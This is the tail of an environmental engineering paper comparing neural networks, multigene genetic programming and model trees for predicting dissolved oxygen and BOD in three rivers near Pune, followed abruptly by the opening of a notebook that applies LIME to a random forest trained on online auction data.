this chart. The best model (high accuracy and less complex) is highlighted with the Red dot/circle. The Pareto (Green dots) represents a model that is not strongly dominated by other models in terms of fitness and complexity, while Non-Pareto (Blue dots) represents dominated models [17,25]. From the Pareto front (Figs. S8), user can decide whether the incremental gain in performance is worth with associated model complexity [25]. It can be seen that in Set 1-1 and 1-3, all the parameters are considered in the equation also depicting their importance and respective contribution as MGGP has a unique characteristic in which the parameter that contribute significantly to prediction are considered while other is removed (as seen in Fig. analysis chart) in predicting the DO [48]. Hence both models 1-1 and 1-3 shown a higher performance and good correlation of all parameters with DO and thus has been considered in the study. Mula river i.e Model 1-2 display a lower performance with a higher RMSE of 1.43 and MARE: 0.06. For Model 1-2 Alkanlinity and pH parameters are not considered in the Eq. 12 this is might be the reason for lower performance as alkalinity shows good correlation with DO. The next technique in discussion is M5T, which works with the underlying phenomenon of Divide and conquer. Fig. S9 shows a typical Model Tree developed by using M5 algorithm for M5T Model MT 1-1 with the linear regression equations developed. #### Linear Equation developed for M5T Model 1-1 ##### (2) $LM1 DO=-0.0028 (EC)-0.0254 (Alk.)+0.0035 (TS)-0.0053 (TDS)+0.1527 (pH)+0.1088 (Temp.)+4.0976$ ##### (3) $LM2 DO=-0.0028 (EC)-0.0093 (Alk.)+0.0035 (TS)-0.0052 (TDS)+0.1527 (pH)+0.023 (Temp.)+6.0998$ ##### (4) $LM3 DO=-0.0048 (EC)-0.0041 (Alk.)+0.0036 (TS)+0.2609 (PH)+1.7089$ The above tree shows linear models (LM 1-3) at different leaf nodes. The first number in the bracket shows the corresponding samples in the sorted subset of node and the second number is the root mean square error (RMSE) of the corresponding linear model divided by the standard deviation of the sample’s subset expressed in percentage [25]. Linear equations developed (Eq. 24) for M5T Model 1-1 using M5 algorithm show negative coefficient for alkalinity, total dissolved solids and electrical conductivity indicating increase in any of these impurities in river decreases the DO content, which is in line with the theoretical understanding of influence of these parameters on DO [46, 47]. Thus, it can be seen that M5T learns the underlying phenomenon reasonably well. The series of equations developed in MT makes is user friendly. M5T models developed in Set 1 display a lower performance as compared to the model performances seen in models developed using ANN and MGGP. With higher RMSE and lower R in models M5T 1-1 and 1-3, they show a lower performance. However, M5T 1-2 shows a good performance of R = 0.82 as compared to M5T models for Mutha and Mula-Mutha. Visual representation of model performances in form of scatter plots for predicting DO using ANN, MGGP and M5T for Model 1-1 (Mutha), Model 1-2 (Mula) and Model 1-3 (Mula-Mutha) is shown in Fig. 2, S10, and S11 below. The scatter plots show a balanced scatter for Model 1-2 rather than Models 1-1 and 1-3. It is evident from the Fig. 2, S10, and S11 that ANN Model 1-2 is able to predict high DO values but display a low performance in prediction of lower low DO values. As far as lower value of DO is concerned MGGP Model 1-2, predicts them better compared to ANN. The M5T Model 1-2 results are slightly less than both ANN and MGGP. It can be observed from the Table 2 that all the three models for 1-2 showing ‘R’ is within 0.82–0.91 range but ANN Model 1-2, has minimum RMSE (0.98). Mula-Mutha is one of the polluted rivers as it receives lots of waste from various sewage treatment plants as well as commom effluent treatmnet plant, hence the data received from this river reflects a variaton in terms of infleuncing parameter. Table S2 shows, Electrical conductivity, alkalinity and total solids having strong correlation (−0.90, −0.83, −0.84, −0.87, −0.83, −0.81) with DO respectively for Mula and Multha river. While the same parametrs Electrical conductivity, alkalinity and total solids showed the least correalion (0.016, −0.266, 0.128) with DO for Mula-Mutha river. It can be observed from the scatter plot shown in Fig. S10 that MGGP Model 1-3 and ANN Model 1-3, are in agreement with the measured values compared to M5T model. Moreover, the RMSE values for MGGP Model 1-3, are lower (0.08) as compared to ANN Model 1-3 and M5T Model 1-3. Perhaps MGGP approach of rejecting the input parameter that do not participate effectively in the model, making it possible to select correct parameters which is reflecting in better fitness measures. ### 6.2. BOD Model Using Observed DO along with Other Input Parameters Set 2 models were designed to predict BOD using observed DO values as input parameter along with other parameters (pH, EC, Alk., TS, TDS, No-N3) as seen in Table S4. The results of these models are then be compared with models of set 3 where in BOD was predicted using modelled DO. This would throw a light on efficacy of the models by virtue of the comparison between the BOD models developed with modelled DO and observed DO. ANN builds an approximate function that matches a list of inputs to the desired outputs. In the process, it adjusts the weights and biases to reach an expected goal, hence makes ANN flexible approach and can contribute towards better performance [29]. In set 2, model developed using ANN (ANN 2-1) i.e., for Mutha river displays a good performance with R= 0.91 and lower RMSE of 0.12. Model 2-3 (i.e., for Mula-Mutha river) shows a lower performance of R= 0.89. Apart from ANN being one of the good techniques in good mapping of input and output parameters, the statistical parameters of output i.e., BOD also plays a major role. The standard deviation of BOD values in model 2-2 (6.8) is less as compared to that in model 1–1(9.5) and 1–3 (9.53), which indicates a lesser spread of values and thus contributing towards better performance in terms of R (0.92). MGGP approach displays the output in form of a standalone equation. The equation developed for Model 2-1 (i.e., for Mutha river) is shown in Eq. 5. ##### (5) $BOD=1.22e-4 (EC)2 (Alk.)2 (DO)+(No3-N)1/2-13.4 tanh (DO)4(No3-N)2-4.09e-6(Alk.) (No3-N) (EC)+(No3-N)+(DO) (EC)+4.04e-4(DO)2 (Alk.)(No3-N)2+13.3$ Eq. 5 displays higher coefficient towards DO, Alkalinity content and nitrates. Fig. S12 for MGGP Model 2-1 confirms the same by displaying nitrate as an influential parameter with dissolved oxygen being the most influential parameter followed by alkalinity while total dissolved solids as least influential parameter for BOD prediction. DO display its higher influence for BOD because it is the basic requirement for reduction of BOD by oxidation of organic matter. Similarly increase in alkalinity content leads to increase total dissolve solids, which directly increases the organic matter content i.e., BOD [35]. While Nitrates are essential nutrients for plants which can cause plants and algae to grow rapidly in any river, and leads to high BOD levels and depletion of oxygen [49]. The equation developed for Mula river, i.e., model 2-2 is given in Eq. 6 below. The equation displays contribution of DO, EC, TS, pH and No3-N. ##### (6) $BOD=7.54 tanh (DO)-1.0 (pH)2-6.57e-5((EC))+(TS)+No3-N)2)2+0.00129 (EC) (TS)1/2NO3-N)-(0.00402 (DO) (EC) No3-N)/((DO)+6.0)1/2-4.91$ Of all the MGGP models developed to predict BOD for Mutha, Mula and Mula-Mutha river, the performance of model for Mutha river is good as compared to other two rivers in terms of higher R and lower RMSE (as seen in Table 2). In M5T, the input variable that maximizes the targeted error reduction is selected to split the data at that node and the remaining is not considered in the developed equation [29]. The series of equations (2 equations) developed for Model 2-1 using Model Tree is as shown in Eq. 7 and 8 below. #### Linear Equation developed for M5T model 2-1 ##### (7) $LM-1 BOD=-3.773 (DO)+0.0055 (Alk.)-0.0033 (TDS)+20.537$ ##### (8) $LM-2 BOD=-0.4616 (DO)-0.7109 (NO3-NO2)+(0.0146 9Alk.)-0.0025 (TDS)+6.2165$ It is quite acceptable from the above equations developed by model tree that DO shows negative coefficients indicating its indirect relation with BOD, followed by positive coefficient to alkalinity indicating its direct relation and for nitrate as a parameter. Performance of M5T model 2-3 in terms of R shows similar value as ANN model 2-3 (0.89, 0.88), though RMSE is slightly at higher side (1.97). Models MT 2-1 show slight lower performance as compared to 2-3. MT 2-2 however shows a good performance for Mula river. It is evident from the Table 2 that ANN and MGGP both perform reasonably well in terms of low RMSE and high ‘R’ for set 2 models. On the other hand, M5T shows a high correlation (R= 0.85) but RMSE is on a higher side (≥2.12) too.ANN has a flexible approach while in M5T the input variables that maximizes the targeted error reduction is selected to split the data at that node and the remaining are not considered in the developed equation [29]. This can reduce the performance of M5T as compared to ANN. Visual representation of the results in the form of scatter plots is shown in Fig. S13, 3, S14 for set 2 models developed using ANN, MGGP and M5T. The scatter plots also confirm the above findings and displayed better results of ANN and MGGP in terms of high R (0.91, 0.96) and low RMSE values (0.12, 0.46) respectively, while M5T shows R 0.85 and RMSE 2.12 at higher side. Scatter plot in Fig. 4, displayed a better agreement between the predicted and measured values by ANN. Moreover, high BOD values are also predicted well. Considering the RMSE both ANN 2-2 and MGGP 2-2 showed low values (0.738, 0.98) respectively. Table 2 and Fig. S12, reflects that MGGP is performing better in terms of high R (0.96) and low RMSE (0.49). ### 6.3. BOD Model Using Modelled DO Models in Set 3 consist of BOD models by using output of Set-1 model i.e., DO to get insight of how well predicted DO values as well as other influencing parameters able to model BOD. As discussed in earlier section, calculation of DO in laboratory is tedious works and the calculated results are subjected to complicated factors like, absence of resulting oxygen demand from algal respiration leading to measurement error [4]. Thus, the basic aim behind the use of modelled DO is to achieve accuracy and save time. On similar lines of Set 1 DO model, set 2 and Set 3 models for BOD were calibrated and tested and the one with having minimum RMSE or high R were selected. It may be emphasized from the Table 2 that all the results for BOD prediction in Set 3 depend on accuracy of DO prediction models in Set 1. In set 1 models developed using ANN, Model 1-1 (i.e., for Mutha river) outperforms ANN model 1-2 (i.e., for Mula river) and ANN model 1-3 (i.e., Mula-Mutha river) in terms of R. However, the lower RMSE in model 3-2 and 3-3 (RMSE= 1.84 and 1.85 respectively) is promising. A similar trend can also be seen in MARE. The performances of these models show a decreasing trend as compared to models developed with observed DO (i.e., in set 2). Models developed using MGGP for Set 3 show similar performances of model 3-1 and 3-2; however, a high RMSE can be seen in model 3-2. The increase in RMSE is due to higher prediction of BOD for few values, thus increasing the standard deviation. However similar to the trend of results seen in ANN models for set 3, performance of MGGP 3-1 model in terms of R is better as compared to other two models (as seen in Table 2). The frequency analysis chart using MGGP for 3-1 (i.e., for Mutha river) is shown in Fig. S15 below emphasis the highest contribution of TS and NO3-N and DO follow by other parameters. DO has a high influence in BOD prediction which was also observed in set 2 and can be seen in all the models in set 3 as well. The set of equations developed for Mutha river i.e., for 3-1 using MGGP is shown in Table S6. The equation also shows higher coefficients towards Total solids and No3-N and DO. According to the fundamentals, this finding is also correct, since total solids reveal the existence of organic matter, which directly contributes to the increase in BOD, while the presence of nitrite demonstrates the breakdown of organic matter [46, 47]. Model Tree technique for Set 3 models for Mutha, Mula and Mula-Mutha river show a satisfactory performance with a good performance of R=0.81 for model 3-1 but with a RMSE of 1.54. However, model 3-2 and 3-3 shows a higher RMSE (3.93 and 3.5 respectively). Fig. 4 shows the Classifier Tree for M5T model 3-1, and the linear equations (911) given by M5T for model 3-1 confirm that model tree has not considered the most important attribute DO for the formation of model, which can be attributed to the splitting criteria of M5T which includes parameters which contributes to minimizing the standard deviation to develop a tree. #### Linear Equations developed for M5T model 3-1 ##### (9) $LM1 BOD=0.0032 (EC)+0.0056 (TS)-0.8806(pH)+0.2283(No3-N)+7.625$ ##### (10) $LM2 BOD=0.0032(EC)+0.0056(TS)-0.8806(pH)+0.2283(No3-N)+8.105$ ##### (11) $LM3 BOD=0.0064(EC)+0.0079(TS)-16.734(pH)+0.4618(No3-N)+106.16$ Scatter plots shown in Fig. S16, S17, 5 displays under and over predictions and this also confirms the lower performance of all the models in Set 3 as compared to models in Set 2. However, in spite of under or over prediction/s, the scatter plot is comparatively balanced. It can be seen from the scatter plots (Fig. S16) that ANN and MGGP outperform M5T. Fig. S15 displayed relatively higher contribution of Dissolved oxygen, Total solids and Nitrite ions towards BOD prediction in MGGP 3-1 which is in tune with the domain knowledge [46]. It also signifies that the underlying phenomenon is been captured well by MGGP. Performance of model 3-2 (i.e., for Mula river); shows that both ANN and MGGP displayed satisfactory performance in terms of R (0.80), however M5T model 3-1 yielded the lowest RMSE (1.53). RMSE describe the difference between the models in the units of the variable. The degree to which RMSE exceeds is an indicator of the extent to which outliers exist in the data. It is also observed that few values were over predicted that is acceptable in case of BOD, because high BOD values show organic pollution in any river and demands for treatment. Fig. 5, and Table 2 reflects better performance of models developed using MGGP and ANN for model 3-3 (i.e., Mula-Mutha river) with correlation coefficient R as 0.8 while MGGP reflecting lowest RMSE 0.98 as compared to ANN and M5T. As discussed earlier that BOD prediction using computed DO is totally dependent on how well DO is predicted. For Set 1-3 and Set 3-3 both MGGP models are working better as compared to ANN and M5T models, though marginally. Furthermore, during performance assessment of any model for its applicability in predicting BOD or DO, it is very important to know the distribution of prediction error with average prediction error which is evaluated by using Mean absolute relative error (MARE). On the basis of MARE and RMSE index analysis MGGP (0.02, 0.98) is showing better result as compared to ANN (0.21, 1.83) and M5T (0.32, 3.5) for model 3-3. ### 7. Conclusion In the present study, an attempt was made to develop a model using ANN, MGGP and M5T for the prediction of two important water quality parameters, namely DO and BOD for three stretches of river, Mutha, Mula, and Mula-Mutha. It can be concluded that all the models have been performed reasonably well, except the model for Mula-Mutha stretch. Models developed by ANN for Set-1 outperformed MGGP and M5T with high R and lower RMSE values owing to its model free nature and capability to map nonlinear input-output. The MGGP model for Set-2 displays better performance for BOD by providing R value more than 0.90 for all the stretches of river as compared to ANN, though marginally. The result of all three set of model seems to be influenced by variability in the data. However, it is to be noted that MGGP worked better than the M5T models in terms of RMSE and R value. Model prepared for BOD using modelled DO for all three stretches totally depends on how well DO is predicted previously and it provides more confidence to the users for the development of model. This study reflects that Data Driven Techniques, like, ANN, MGGP and M5T learn from the data provided in training and try to grasp influencing parameters which are in tune with fundamental knowledge of water quality under Environmental Engineering. Research also shows that all models were unable to maintain their accuracy for low DO values, however, significant improvement is observed for the MGGP for low DO prediction. Thus, further work shall focus on prediction of accuracy for lower DO values. Furthermore, it is also recommended to develop the models by merging the data of all three stretches into one as it would provide more data for training which may improve the overall accuracy. ### Notes Author Contributions P.S. (Ph.D Scholar) Conducted all the data collection, model formation, calculations and wrote the manuscript. S.N.L (Professor) revised the manuscript. P.S.K. (Associate Professor) revised the manuscript. Conflict-of-Interest Statement The authors declare that they have no conflict of interest. ### References 1. Shrivastava P, Burande A, Sharma N. Fuzzy Environmental Model for Evaluating Water Quality of Sangam Zone during Maha Kumbh. Appl. Comput. Intell Soft Comput. 2013;13:1–7. https://doi.org/10.1155/2013/265924 2. Jingsheng C, Tao Y, Ongley E. Influence of high levels of total suspended solids on measurement of COD and BOD in the Yellow River, China. Environ. Monit Assess. 2006;116:321–334. http://dx.doi.org/10.1007/s10661-006-7374-2 3. Basant N, Gupta S, Malik A, Singh KP. Linear and nonlinear modeling for simultaneous prediction of dissolved oxygen and biochemical oxygen demand of the surface water—a case study. Chemometr. Intell Lab Syst. 2010;104:172–180. http://dx.doi.org/10.1016%2Fj.chemolab.2010.08.005 4. Singh KP, Basant A, Malik A, Jain G. Artificial neural network modeling of the river water quality a case study. Ecol Modell. 2009;888–895. http://dx.doi.org/10.1016/j.ecolmodel.2009.01.004 5. Solomatine DP, Ostfeld A. Data-driven modelling: some past experiences and new approaches. J Hydroinf. 2010;10:3–22. https://doi.org/10.2166/HYDRO.2008.015 6. Orouji H, Bozorg , Haddad O, Fallah-Mehdipour E, Mariño MA. Modeling of water quality parameters using data-driven models. J. Environ Eng. 2013;139:947–957. http://dx.doi.org/10.1061/(ASCE)EE.1943-7870.0000706 7. Akkoyunlu A, Altun H, Cigizoglu HK. Depth-integrated estimation of dissolved oxygen in a lake. J. Environ Eng. 2011;137:961–967. http://dx.doi.org/10.1061/(ASCE)EE.1943-7870.0000376 8. Dogan E, Sengorur B, Koklu R. Modeling biological oxygen demand of the Melen River in Turkey using an artificial neural network technique. J. Environ Manage. 2009;90:1229–1235. https://doi.org/10.1016/j.jenvman.2008.06.004 9. Antanasijević D, Pocajt V, Povrenović D, Perić-Grujić , Ristić M. Modelling of dissolved oxygen in the Danube River using artificial neural networks and Monte Carlo simulation uncertainty analysis. J Hydrol. 2013;519:1895–1907. https://doi.org/10.1016/j.jhydrol.2014.10.009 10. Verma AK, Singh TN. Prediction of water quality from simple field parameters. Environ Earth Sci. 2013;69:821–829. https://doi.org/10.1007/s12665-012-1967-6 11. Schmid BH, Koskiaho J. Artificial neural network modeling of dissolved oxygen in a Wetland Pond: The case of Hovi, Finland. J Hydrol Eng. 2006;11:188–192. https://doi.org/10.1061/(ASCE)1084-0699(2006)11:2(188) 12. Talib A. Predicting Biochemical Oxygen Demand as Indicator of River Pollution Using Artificial Neural Network. Int J Inf Educ Technol. 2012;2–6:259–261. https://mssanz.org.au/modsim09 13. Chen WB, Liu WC. Artificial neural network modeling of dissolved oxygen in reservoir. Environ. Monit Assess. 2014;186:1203–1217. https://doi.org/10.1007/s10661-013-3450-6 14. Sarkar A, Pandey P. River Water Quality Modelling using Artificial Neural Network Technique. Aquat Procedia. 2015;4:1070–1077. http://dx.doi.org/10.1016/j.aqpro.2015.02.135 15. Olyaie E, Zare AH, Danandeh MA. A comparative analysis among computational intelligence techniques for dissolved oxygen prediction in Delaware River. Geosci Front. 2017;8:517–527. http://dx.doi.org/10.1016%2Fj.gsf.2016.04.007 16. Heddam S, Kisi O. Modelling Daily Dissolved Oxygen Concentration Using Least Square Support Vector Machine, Multivariate Adaptive Regression Splines and M5 model Tree. J Hydrol. 2018;1–38. https://doi.org/10.1016/J.JHYDROL.2018.02.061 17. Gandomi AH, Alavi AH. A new multi-gene genetic programming approaches to nonlinear system modeling. Part I: materials and structural engineering problems. Neural Comput Appl. 2011;21:171–187. http://dx.doi.org/10.1007/s00521-011-0734-z 18. Murat A, Kisi O. Modeling of dissolved oxygen concentrations using different neural network techniques in Foundation Creek, El Paso County, Colorado. J. Environ. Eng ASCE. 2012;138:654–662. https://doi.org/10.1061/(ASCE)EE.1943-7870.0000511 19. The ASCE Task Committee. Artificial Neural Networks in Hydrology I. Preliminary concepts. J Hydrol Eng. 2000;5:115–123. https://doi.org/10.1061/(ASCE 20. Maier H, Dandy G. Neural networks for the prediction and forecasting of water resources variables: a review of modelling issues and applications. Environ Model Softw. 2000;15:101–124. http://dx.doi.org/10.1016/S1364-8152(99)00007-9 21. Dawson CW, Wilby RL. Hydrological modeling using Artificial Neural Networks. Prog. Phys Geogr. 2001;25:80–108. http://dx.doi.org/10.1177/030913330102500104 22. Jain P, Deo MC. Neural Networks in Ocean Engineering. Int. J Ships Offshore Struct. 2006;1:25–35. https://doi.org/10.1533/saos.2004.0005 23. Londhe SN, Panchang V. Correlation of wave data from buoy networks. Estuar. Coast Shelf Sci. 2007;4:481–492. http://dx.doi.org/10.1016/j.ecss.2007.05.003 24. Mohamed E. Developing a Neural Networks Model for Evaluating Financial Performance of Residential Companies. IOSR J. mech. civ eng. 2017;14:46–59. https://doi.org/10.9790/1684-1402024659 25. Kulkarni PS, Londhe SN, Dixit PD. A comparative study of concrete strength prediction using artificial neural network, multigene programming and model tree. Chall. J. Struct Mech. 2019;5:42–61. https://doi.org/10.20528/CJSMEC.2019.02.002 26. Hashmi S, Halawani SM, Barukab OM, Ahmad A. Model trees and sequential minimal optimization based support vector machine models for estimating minimum surface roughness value. Appl. Math Model. 2015;39:1119–1136. https://doi.org/10.1016/J.APM.2014.07.026 27. Abolfathi S, Yeganeh-Bakhtiary A, Hamze-Ziabari SM, Borzooei S. Wave run up prediction using M5 model tree algorithm. Ocean Eng. 2015;112:76–81. http://dx.doi.org/10.1016/j.oceaneng.2015.12.016 28. Quinlan JR. learning with continuous classes. In : Proceedings of the Fifth Australian Joint Conference on Artificial Intelligence; Hobart, Australia. 16–18 November2014; Singapore: 343–348. https://doi.org/10.4236/ojas.2014.43017 29. Solomatine DP, Xue Y. M5 model trees compared to neural networks: application to flood forecasting in the upper reach of the Huai River in China. J. Hydrol Eng. 2004;9:491–501. https://doi.org/10.1061/(ASCE)1084-0699(2004)9:6(491) 30. Solomatine DP, Dulal K. Model tree as an alternative to neural network in rainfall-runoff modeling. Hydrol. Sci J. 2003;48:399–411. https://doi.org/10.1623/hysj.48.3.399.45291 31. Rahimikhoob A, Behbahani SMR, Banihabib ME. Comparative study of statistical and artificial neural network’s methodologies for deriving global solar radiation from NOAA satellite image. Int. J Climatol. 2013;33:480–486. http://dx.doi.org/10.1002/joc.3441 32. Searson DP, Leahy DE, Willis MJ. GPTIPS: An open source genetic programming toolbox for multigene symbolic regression. In : Proceedings of the International Multi Conference of Engineers and Computer Scientists I, IMECS; March 17–19, 2010; Hong Kong. http://sites.google.com/site/gptips4matlab/ 33. Londhe SN, Dixit PR. Genetic Programming: A Novel Computing Approach in Modeling Water Flows Genetic Programming – New Approaches and Successful Applications. Published by Intech Sci. 2009;201–207. http://dx.doi.org/10.5772/48179 34. Shahin MA. State-of-the-art review of some artificial intelligence applications in pile foundations. Geosci Front. 2014;1–12. https://doi.org/10.1016/j.gsf.2014.10.002 35. Radtke DB, Davis JV, Wilde FD. Specific electrical conductance, Techniques of water-resources. 9th edSupersedes USGS Techniques of Water-Resources Investigations. 2005. p. 1–22. https://doi.org/10.3133/twri09A6.3 36. Gary E. Protecting Water Quality (Ideas in Conflict). 1st edGem Pubns; 1985. p. 10–52. 37. Hem JD. Study and interpretation of the chemical characteristic of natural water. U.S. Geological Survey of Water-Supply paper. 1989. p. 2254 38. Zhang C. Nearly Unbiased Variable Selection under Minimax Concave Penalty. The Annals of Statistics. 2010;38:894–942. https://doi.org/10.1214/09-AOS729 39. Thomas GR. Advances in water treatment and management. 1st edsPublished by CRC press; 1991. p. 16–24. 40. Altun H, Bilgil A, Fidan BC. Treatment of multi-dimensional data to enhance neural network estimators in regression problems. Expert Syst Appl. 2007;32:599–605. http://dx.doi.org/10.1016%2Fj.eswa.2006.01.054 41. Fletcher D, Goss E. Forecasting with neural networks: an application using bankruptcy data. Inform Manage. 1993;24:159–167. https://doi.org/10.1016/0378-7206(93)90064-Z 42. Math Works Matlab R 2016b (Version 9.1) Product [Internet]. Simulation Software - MATLAB & Simulink (mathworks.com); 43. Weka (Version 3.9) Product [Internet]. https://www.cs.waikato.ac.nz/ml/weka 44. Searson DP, Willis MJ, Montague GA. Co-evolution of non-linear PLS model components. J Chemom. 2007;2:592–603. http://citeseerx.ist.psu.edu 45. Hii C, Searson DP, Willis MJ. Evolving toxicity models using multigene symbolic regression and multiple objectives. Int. J. Mach. Learn Comput. 2011;1:30–35. https://doi.org/10.7763/IJMLC.2011.V1.5 46. Garg SK. Environmental Engineering and water supply engineering. 33rdedPublished by Khanna Publisher; 2010. p. 48–102. 47. Metcalf Eddy Waste water engineering: Treatment and Reuse. 4thedPublished by McGraw Hill Education; 2017. p. 180–225. 48. Londhe SN, Kulkarni P, Dixit P, Silva A, Neves R, Brito J. Tree Based Approaches for Predicting Concrete Carbonation Coefficient. Appl Sci. 2022;12:38–74. https://doi.org/10.3390/app12083874 49. Poulsen R, Cedergreen N, Hayes T, Hansen M. Environmental Science & Technology. 2018;52:3869–3887. https://doi.org/10.1021/acs.est.7b06419 ##### Fig. 1 Frequency Analysis chart for MGGP Model 1-1. ##### Fig. 2 DO Prediction for Model 1-1 by ANN-MGGP-M5T. ##### Fig. 3 BOD Prediction for Model 2-2 by ANN-MGGP-M5T. ##### Fig. 4 Classifier Tree for M5T Model 3-1. ##### Fig. 5 BOD Prediction for Model 3-3 by ANN-MGGP-M5T. ##### Table 1 Details of Model Developed Targeted output Model No. ANN-Architecture Number of equations in M5T MGGP Parameters not considered in the equation Dissolved Oxygen (DO) 1-1 6:10:1 3 NIL 1-2 6:11:1 1 Alkalinity and pH 1-3 6:32:1 6 NIL Biochemical Oxygen Demand (BOD) (by observed DO with other parameters) 2-1 7:8:1 1 TS, Alkalinity, TDS 2-2 7:8:1 4 NIL 2-3 7:4:1 2 TS, Alkalinity, EC Biochemical Oxygen Demand (BOD) (by modelled DO with other parameters) 3-1 7:4:1 1 TS & TDS 3-2 7:1:1 1 Alkalinity 3-3 7:4:1 2 pH & TDS ##### Table 2 Performance of Model Developed Using ANN, MGGP and M5T for Prediction of DO and BOD Targeted Output Technique Model No. RMSE (mg/L) MARE (mg/L) R Set 1 Dissolved Oxygen (DO) ANN 1-1 0.61 0.02 0.89 1-2 0.98 0.04 0.91 1-3 1.52 0.25 0.82 MGGP 1-1 0.51 0.08 0.88 1-2 1.43 0.06 0.90 1-3 0.08 0.008 0.85 M5T 1-1 1.98 0.11 0.78 1-2 1.14 0.06 0.82 1-3 0.70 0.08 0.78 Set 2 Biochemical Oxygen Demand (Using observed DO along with other parameters) ANN 2-1 0.12 0.002 0.91 2-2 0.738 0.005 0.92 2-3 0.848 0.012 0.89 MGGP 2-1 0.49 0.008 0.96 2-2 0.98 0.009 0.91 2-3 1.27 0.02 0.90 M5T 2-1 2.12 0.04 0.85 2-2 1.42 0.05 0.88 2-3 1.97 0.08 0.88 Set 3 Biochemical Oxygen Demand (Using modelled DO along with other parameters) ANN 3-1 1.98 0.19 0.85 3-2 1.84 0.04 0.80 3-3 1.83 0.21 0.80 MGGP 3-1 2.03 0.24 0.86 3-2 2.16 0.08 0.80 3-3 0.98 0.02 0.80 M5T 3-1 1.54 0.58 0.81 3-2 3.93 0.12 0.73 3-3 3.5 0.32 0.79 ##### Table 3 Equations for Each of the Genes Term Value Bias 4.16 Gene 1 (0.0214 (EC)(TS)1/2(pH) /(Alk.)) Gene 2 − (0.00163(2.0 (TS) (pH) + (TDS) (NO3-NO2) +2.0 (EC)3/2 (pH)))/(pH) Gene 3 0.0651 (Alk.) + 0.0651 (pH) − 0.0651 (Alk.)1/2 Gene 4 2.98 e−6 (EC) 5/2 TOOLS PDF Links PubReader Full text via DOI Download Citation Supplement Print Share: METRICS 0 Crossref 0 Scopus 765 View 14 Download Editorial Office 464 Cheongpa-ro, #726, Jung-gu, Seoul 04510, Republic of Korea TEL : +82-2-383-9697   FAX : +82-2-383-9654   E-mail : [email protected] Copyright© Korean Society of Environmental Engineers. About |  Browse Articles |  Current Issue |  For Authors and Reviewers
# Interpreting Machine Learning Algorithms with LIME¶ We have often found that Machine Learning (ML) algorithms capable of capturing structural non-linearities in training data - models that are sometimes referred to as 'black box' (e.g. Random Forests, Deep Neural Networks, etc.) - perform far better at prediction than their linear counterparts (e.g. Generalised Linear Models). They are, however, much harder to interpret - in fact, quite often it is not possible to gain any insight into why a particular prediction has been produced, when given an instance of input data (i.e. the model features). Consequently, it has not been possible to use 'black box' ML algorithms in situations where clients have sought cause-and-effect explanations for model predictions, with end-results being that sub-optimal predictive models have been used in their place, as their explanatory power has been more valuable, in relative terms. In this notebook, we trial a different approach - we train a 'black box' ML model to the best of our abilities and then apply an ancillary algorithm to generate explanations for the predictions. More specifically, we will test the ability of the Local Interpretable Model-agnostic Explanations (LIME) algorithm, recently described by Ribiero et al (2016), to provide explanations for a Random Forest regressor trained on multiple-lot on-line auction data. The paper that describes the LIME algorithm can be found here: https://arxiv.org/pdf/1602.04938v1.pdf; details of its implementation in Python (as used in this notebook), can be found here: https://github.com/marcotcr/lime/; while a more general discussion of ML algorithm interpretation (that includes LIME), can be found in the eBook by Christoph Molnar, which can be found here: https://christophm.github.io/interpretable-ml-book/. In [1]: %matplotlib inline import numpy as np import pandas as pd import matplotlib.pyplot as plt ## Load Data and Yield Pandas DataFrame¶ Load the auction data from CSV file and take a quick glimpse. In [2]: auction_eval = pd.read_csv('../data/auction_data.csv') auction_eval.info() <class 'pandas.core.frame.DataFrame'> RangeIndex: 6220 entries, 0 to 6219 Data columns (total 10 columns): auction_id 6220 non-null int64 RoR 6220 non-null float64 STR 6220 non-null float64 BPL 6220 non-null float64 lots 6220 non-null int64 product_types 6220 non-null float64 avg_reserve 6220 non-null float64 avg_start_bid 6220 non-null float64 auction_mech 6220 non-null object country 6220 non-null object dtypes: float64(6), int64(2), object(2) memory usage: 486.0+ KB Out[2]: auction_id RoR STR BPL lots product_types avg_reserve avg_start_bid auction_mech country 0 1324 0.984284 0.035471 11.066667 45 0.822222 22090.283008 0.000000 EnglishForward TR 1 1325 0.000000 0.000000 11.000000 52 0.634615 18758.711989 0.000000 EnglishForward TR 2 1326 0.774436 0.723315 7.000000 4 1.000000 9593.157715 0.161214 EnglishForward CZ 3 1327 0.933634 0.822529 17.464286 28 0.857143 16195.701695 0.000000 EnglishForward EU 4 1328 0.957757 0.963006 11.487179 39 0.820513 8733.333333 0.000000 EnglishForward EU ### Data Description¶ • auction_id - unique identifier for a single multi-lot online auction event; • RoR - the average Return-on-Reserve for successfully sold lots in the multi-lot online auction event, computed as realised price divided by reserve price; • STR - the proportion of lots (by value) that were successfully sold in the auction event; • BPL - the average number of bidders per-lot; • lots - the number of lots offered in the multi-lot online auction event; • product_types - the number of different product types offered in the multi-lot online auction event; • avg_reserve - the average reserve price over all lots in the multi-lot online auction event • avg_start_bid - the average starting-bid (expressed as a fraction of the reserve bid), over all lots in the multi-lot online auction event • auction_mech - the auction mechanim used for the auction event (one of English Forward, Sealed Bid or Fixed Price); and, • country - the local market running the auction. The goal of the modeling exercise that we are interested in, is to use as many features as possible to explain the drivers of RoR, ex-anti. That is, features that represent configurable auction (or marketplace) parameters - not auction outcomes (like RoR itself). We make an exception for BPL, as we would like to know how the success of a pre-auction marketing process, which could be viewed as driving factors of BPL, will impacts RoR. In [3]: RoR = ['RoR'] model_features = ['BPL', 'lots', 'product_types', 'avg_reserve', 'avg_start_bid', 'auction_mech', 'country'] ### Outlier Removal and other Dataset Filtering¶ We are aware that outliers have found their way into the data. So, we will limit our modeling dataset by filtering-out values that don't feel correct, based on our knowledge of the data (and the issues embedded within it). As such, we will filter-out the top percentile of RoR values as we know there is ambiguity surrounding reserve prices. Likewise, we have spotted auction events with average reserve prices in the millions of Euros, so we will filter-out the top percentile of mean reserve price observations, as well. In [5]: pctile_thold = 0.99 model_data = ( auction_eval.copy() .loc[(auction_eval['STR'] > 0) & (auction_eval['RoR'] < auction_eval['RoR'].quantile(pctile_thold)) & (auction_eval['avg_reserve'] < auction_eval['avg_reserve'].quantile(pctile_thold)), :] .assign(country = auction_eval['country'].apply(lambda x: 'country_' + x), auction_mech = auction_eval['auction_mech'].apply(lambda x: 'auction_mech_' + x)) [RoR + model_features]) desc_features = ['auction_id'] model_data.describe() Out[5]: RoR BPL lots product_types avg_reserve avg_start_bid count 5581.000000 5581.000000 5581.000000 5581.000000 5581.000000 5581.000000 mean 0.986065 6.424684 41.514603 0.768097 10975.097908 0.153462 std 0.124448 5.157156 38.249595 0.202118 4904.108680 0.348923 min 0.052569 1.000000 1.000000 0.002841 200.000000 0.000000 25% 0.940870 1.000000 12.000000 0.682540 7479.575548 0.000000 50% 1.000000 